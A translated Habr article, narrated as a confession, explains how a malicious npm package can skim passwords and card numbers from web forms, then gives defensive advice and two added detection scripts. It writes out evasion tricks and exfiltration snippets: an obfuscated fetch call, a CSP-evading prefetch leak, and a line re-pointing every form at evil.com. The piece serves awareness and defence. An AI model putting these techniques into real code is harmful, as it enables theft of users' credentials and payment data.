
The story of how I steal credit card numbers and passwords from visitors to your sites

Sequel: The story of how not to let me steal credit card numbers and passwords from visitors to your sites
This is a translation of an article by someone who has been stealing usernames, passwords and credit card numbers from various sites for several years.


What I am about to tell really happened. Or perhaps my story is only based on real events. Or perhaps all of it is fiction.

This week stood out: an insane stretch when everyone was worried about security. It felt as though new vulnerabilities were appearing daily. It was not easy for me to pretend I understood what was going on when people close to me asked about it. They were worried about being hacked, about their data flowing off to some unknown destination. All this made me look at many things in a new way.

As a result, reluctantly, I decided to set the record straight and tell the whole world how I have been stealing usernames, passwords and credit card numbers from various websites over the past few years. Perhaps you are the administrator or developer of one of them.

How it works


The code that steals data from sites is, by itself, very simple. It works best on a page with a form: it hooks the blur event of the inputs and the submit event of the form, collects whatever has been typed, and sends it off.



The code also checks where it is running. It stays silent when the hostname is an IP address or contains dev, test, qa, uat or staging (matched as whole words, with \b), so nobody ever sees it fire in a development or test environment.

▍ Just watch the HTTP requests!

Data is sent only between 7 pm and 7 am, when a developer is least likely to be sitting in front of the network tab; that window still covers about 95% of the traffic worth having.

▍ Just check GitHub!

Yes, the code is on GitHub. But what you read on GitHub is not what gets installed from npm.

The files entry in package.json lists lib, and that is what npm publish uploads to npm. lib is also in .gitignore, so it never reaches GitHub: the repository holds the clean source, the registry holds the build with the extra code.

When did you last compare the package you got from npm with the repository on GitHub, and in particular /lib/package.min.js with /src/package.js?

▍ Just look in node_modules!

You will not find fetch or XMLHttpRequest spelled out in the code either. Instead:

const i = 'gfudi';
// shift every character code down by one: 'gfudi' becomes 'fetch'
const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
// self is window, so this is window.fetch(urlWithYourPreciousData)
self[k(i)](urlWithYourPreciousData);

«gfudi» is «fetch» with every character shifted up by one, and self is just another name for window.

Or, even simpler, instead of fetch(...):

self['\u0066\u0065\u0074\u0063\u0068'](...)

A text search for fetch in node_modules finds nothing.

Nor does the code depend on fetch at all. Where fetch is unavailable, new EventSource(urlWithYourPreciousData) does the same job, and a serviceWorker can make its own fetch calls outside the page; whichever of fetch, the service worker or EventSource is available gets used.
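The two disguises above are easy to undo mechanically. As an added example (not from the original article), the scanner below pulls every string literal out of a script, decodes \uXXXX escapes and tries small character shifts, and reports any literal that turns into the name of a network sink. The sink list (the text's fetch, XMLHttpRequest and EventSource plus sendBeacon and WebSocket, which are my additions) and the SAMPLE script are constructed for the demo; a real run would feed it the files under node_modules.

```javascript
// Names a harvested payload would be handed to. sendBeacon and WebSocket are my additions
// to the article's fetch / XMLHttpRequest / EventSource.
const NETWORK_SINKS = ['fetch', 'XMLHttpRequest', 'EventSource', 'sendBeacon', 'WebSocket'];

// Undo \uXXXX escapes in a raw literal: '\u0066\u0065\u0074\u0063\u0068' -> 'fetch'
function decodeUnicodeEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Shift every character code by delta: shiftChars('gfudi', -1) -> 'fetch'
function shiftChars(s, delta) {
  return Array.from(s, c => String.fromCharCode(c.charCodeAt(0) + delta)).join('');
}

// Every single- or double-quoted string literal in the source, returned raw (escapes untouched).
// Template literals and regex literals are deliberately not handled.
function stringLiterals(source) {
  const re = /'((?:\\.|[^'\\\n])*)'|"((?:\\.|[^"\\\n])*)"/g;
  const out = [];
  let m;
  while ((m = re.exec(source)) !== null) out.push(m[1] !== undefined ? m[1] : m[2]);
  return out;
}

// Report literals that become a sink name after escape decoding or a shift of up to maxShift.
function findHiddenSinks(source, maxShift = 3) {
  const findings = [];
  for (const lit of stringLiterals(source)) {
    const candidates = [{ how: 'unicode-escape', value: decodeUnicodeEscapes(lit) }];
    for (let d = -maxShift; d <= maxShift; d++) {
      if (d !== 0) candidates.push({ how: `shift ${d}`, value: shiftChars(lit, d) });
    }
    for (const { how, value } of candidates) {
      // value !== lit: a plain 'fetch' is not hidden and is left to an ordinary grep
      if (value !== lit && NETWORK_SINKS.includes(value)) {
        findings.push({ literal: lit, how, sink: value });
      }
    }
  }
  return findings;
}

// Constructed sample: the two snippets from the text, side by side.
const SAMPLE = `
const i = 'gfudi';
const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
self[k(i)](urlWithYourPreciousData);
self['\\u0066\\u0065\\u0074\\u0063\\u0068'](urlWithYourPreciousData);
`;
```

The check is heuristic: it catches the two encodings the text shows and nothing smarter (string concatenation, atob, or names assembled at run time). It is useful as a cheap first pass over a dependency tree, not as proof of absence.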

▍ Just use CSP!

What about a site with a strict Content Security Policy (CSP)? Not a problem either; this goes straight through a CSP:

const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';                 // a prefetch, not an XHR or a fetch
linkEl.href = urlWithYourPreciousData;   // the stolen data travels in the URL
document.head.appendChild(linkEl);       // the browser issues the GET on its own

A CSP, in other words, is not a 100% guarantee.

Even the strictest CSP does not cover this: connect-src governs fetch, XHR and friends, but a prefetch is an ordinary GET issued by the browser for a link element, and connect-src does not apply to it.

If a site's CSP reports violations (report-uri), a blocked request would give the code away, so it reads the policy first and uses only the channels the policy leaves open. Reading the page's own CSP takes a single request:

fetch(document.location.href)
  .then(resp => {
    const csp = resp.headers.get('Content-Security-Policy');
    // which directives are set? which channels are still open?
  });

Not every site has a CSP. Google, for example, has one, with a restrictive connect-src and a default-src that catches everything else.

But most sites are not Google.

Amazon, for instance, has no CSP at all. Neither does eBay.

Twitter and PayPal have CSPs, and strict ones, restricting where the page may send data. But default-src is not a catch-all: form-action, the directive that controls where a form may be submitted, does not fall back to default-src and has to be set explicitly.

So on a site that forgot form-action, the code simply re-points every form on the page (the payment form included) at a server of its choosing:

Array.from(document.forms).forEach(formEl => formEl.action = `//evil.com/bounce-form`);
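Both gaps just described, the prefetch GET and a missing form-action, can be read straight off the policy string. As an added example (not the author's code), the function below parses a CSP header and lists the exfiltration channels it leaves open, applying the fallback rules the text relies on: connect-src falls back to default-src, form-action does not, and a prefetch link is outside connect-src entirely. The three sample headers are constructed for the demo, not copied from any real site.

```javascript
// Fetch directives that inherit default-src when absent (CSP Level 3 fallback list).
// form-action is deliberately not here: it has no fallback and must be set explicitly.
const FALLS_BACK_TO_DEFAULT = new Set([
  'connect-src', 'script-src', 'style-src', 'img-src', 'font-src', 'media-src',
  'object-src', 'frame-src', 'child-src', 'worker-src', 'manifest-src',
]);

// "a b; c d" -> Map { a => [b], c => [d] }. A repeated directive is ignored, as browsers do.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!policy.has(name)) policy.set(name, tokens.slice(1));
  }
  return policy;
}

// Source list that actually applies to `directive`, or null when nothing restricts it.
function effectiveSources(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (FALLS_BACK_TO_DEFAULT.has(directive) && policy.has('default-src')) return policy.get('default-src');
  return null;
}

// True when a source list lets the page reach an arbitrary, attacker-controlled origin:
// no restriction at all, '*', or a bare scheme such as https: that matches every host.
function allowsAnyOrigin(sources) {
  if (sources === null) return true;
  return sources.some(s => s === '*' || /^https?:$/i.test(s));
}

// Exfiltration channels from the article that this policy leaves open, as stable keys.
function exfilChannels(header) {
  const policy = parseCsp(header);
  const open = [];
  if (allowsAnyOrigin(effectiveSources(policy, 'connect-src'))) open.push('connect-src');  // fetch / XHR / EventSource
  if (allowsAnyOrigin(effectiveSources(policy, 'form-action'))) open.push('form-action');  // forms re-pointed to evil.com
  open.push('prefetch');                                                                    // <link rel="prefetch"> is outside connect-src
  if (!policy.has('report-uri') && !policy.has('report-to')) open.push('no-reporting');    // a blocked attempt would go unnoticed
  return open;
}

// Constructed sample policies (not copied from any real site).
const STRICT = "default-src 'self'; connect-src 'self' https://api.example.com; form-action 'self'; report-uri /csp-report";
const DEFAULT_ONLY = "default-src 'self'";
const WIDE_OPEN = "default-src *; connect-src https:";
```

DEFAULT_ONLY is the instructive case: the author of that policy probably believes everything is locked down, yet forms on the page can still be pointed anywhere because form-action was never set. The prefetch channel is listed unconditionally, which is exactly the text's point: the policy string cannot close it, only keeping untrusted code off the page can.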

What to do?

Keep third-party code away from pages that handle sensitive data: npm packages, Google Tag Manager and the like have no business on a page that takes a card number.

If the page cannot live without them, put the sensitive form in a separate iFrame.

A bare React application already drags in 138 npm packages. The page that collects card numbers should depend on none of them, so load that form in an iFrame from a page that carries no third-party JavaScript (ideally no JavaScript at all).

npm hosts some 400,000 packages, and nobody audits them all.

Source: https://habr.com/ru/post/346442/

